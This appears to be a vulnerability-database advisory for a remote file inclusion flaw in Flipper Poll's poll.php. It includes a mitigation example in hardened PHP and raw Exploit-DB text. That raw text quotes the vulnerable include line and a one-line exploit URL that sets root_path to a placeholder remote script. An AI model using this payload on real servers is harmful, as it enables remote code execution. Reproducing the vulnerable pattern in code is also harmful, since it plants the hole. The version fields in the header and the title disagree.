Vendor: Flipper Poll
By: Unknown
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Flipper Poll
Affected Version From: 1.1.2000
Affected Version To: 1.1.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Flipper Poll v1.1.0 (poll.php) remote file include vuln

The vulnerability allows an attacker to include a remote file by manipulating the 'root_path' parameter in the 'poll.php' script. This can be exploited to execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input and properly sanitize the 'root_path' parameter before including any files.
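The mitigation applied to the vulnerable `include_once` line quoted in the raw data on this page, as an added example that is not Flipper Poll's code or part of the original advisory. The helper name `resolve_local_include` is hypothetical, and a `config.php` sitting beside the script is assumed.

```php
<?php
// Added example: not Flipper Poll's code. resolve_local_include() is a
// hypothetical helper; a config.php next to this script is assumed.
//
// Vulnerable pattern quoted on this page, shown as a comment for comparison:
//   include_once($root_path . 'config.php');
// Nothing in that line fixes $root_path to a server-side value, so the
// 'root_path' request parameter decides what gets included.

// Hardened form: the base directory comes from the script's own location,
// never from request data.
$root_path = __DIR__ . DIRECTORY_SEPARATOR;

function resolve_local_include(string $base, string $file): string
{
    $baseReal = realpath($base);
    if ($baseReal === false || !is_dir($baseReal)) {
        throw new RuntimeException('Base directory does not exist');
    }
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // basename() drops every directory component, so "../" sequences and
    // URL-style prefixes cannot change where the file is looked up.
    $candidate = realpath($prefix . basename($file));

    // realpath() resolves symlinks; the result must still sit under $base.
    if ($candidate === false
        || strncmp($candidate, $prefix, strlen($prefix)) !== 0
        || !is_file($candidate)) {
        throw new RuntimeException('Refusing include outside application directory');
    }
    return $candidate;
}

include_once resolve_local_include($root_path, 'config.php');

// Defence in depth (php.ini): allow_url_include = Off
```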

Exploit-DB raw data:

Flipper Poll v1.1.0 (poll.php) remote file include vuln
---------------------------------------------------------------------------------
 
Found: Cyber-Security
cyber-security.org
 
---------------------------------------------------------------------------------
 
Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828
 
---------------------------------------------------------------------------------

Vuln Code: include_once($root_path . 'config.php');
 
---------------------------------------------------------------------------------
 
Exploit: /poll.php?root_path=evilscripts?
 
---------------------------------------------------------------------------------
 
Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596
 
---------------------------------------------------------------------------------

# milw0rm.com [2007-02-02]